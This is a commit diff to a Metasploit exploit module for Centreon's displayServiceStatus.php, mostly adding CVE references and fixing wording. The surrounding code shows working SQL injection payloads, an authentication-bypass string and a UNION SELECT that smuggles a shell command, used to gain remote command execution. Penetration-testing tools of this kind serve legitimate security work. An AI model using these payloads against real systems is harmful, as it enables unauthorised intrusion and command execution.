Add references and fix typos

jvazquez-r7 · jvazquez-r7 · commit d831a2062985 · 2014-10-17T15:29:28.000-05:00
diff --git a/modules/exploits/linux/http/centreon_sqli_exec.rb b/modules/exploits/linux/http/centreon_sqli_exec.rb
@@ -16,21 +16,23 @@ def initialize(info = {})
       'Description'    => %q{
         This module exploits several vulnerabilities on Centreon 2.5.1 and prior and Centreon
         Enterprise Server 2.2 and prior. The combination of both vulnerabilities, in the
-        displayServiceStatus.php component, allow to remote unauthenticated execution of
-        arbitrary commands. The module only requires a session available in the application
-        at the moment of exploitation. This module has been tested successfully on Centreon
-        Enterprise Server 2.2.
+        displayServiceStatus.php component, allows remote unauthenticated execution of arbitrary
+        commands. The module only requires a session available in the application at the moment
+        of exploitation. It means a legit ust must be logged in. This module has been tested
+        successfully on Centreon Enterprise Server 2.2.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Tom MaZ', # Vulnerability Discovery
+          'MaZ', # Vulnerability Discovery and Analysis
           'juan vazquez' # Metasploit Module
         ],
       'References'     =>
         [
           ['CVE', '2014-3828'],
-          ['CVE', '2014-3829']
+          ['CVE', '2014-3829'],
+          ['US-CERT-VU', '298796'],
+          ['URL', 'http://seclists.org/fulldisclosure/2014/Oct/78']
         ],
       'Arch'           => ARCH_CMD,
       'Platform'       => 'unix',
@@ -84,7 +86,7 @@ def exploit
     if check == Exploit::CheckCode::Safe
       fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited")
     elsif check == Exploit::CheckCode::Detected
-      fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited or you just need to wait until someone logged in")
+      fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited, maybe you just need to wait until someone logs in")
     end
 
     print_status("#{peer} - Exploiting...")
@@ -93,6 +95,7 @@ def exploit
     session_injection = "#{random_id}' or '#{random_char}'='#{random_char}"
     template_injection = "' UNION ALL SELECT 1,2,3,4,5,CHAR(59,#{mysql_payload}59),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- /**"
     res = send_template_id(session_injection, template_injection)
+
     if res && res.body && res.body.to_s =~ /sh: --imgformat: command not found/
       vprint_status("Output: #{res.body}")
     end
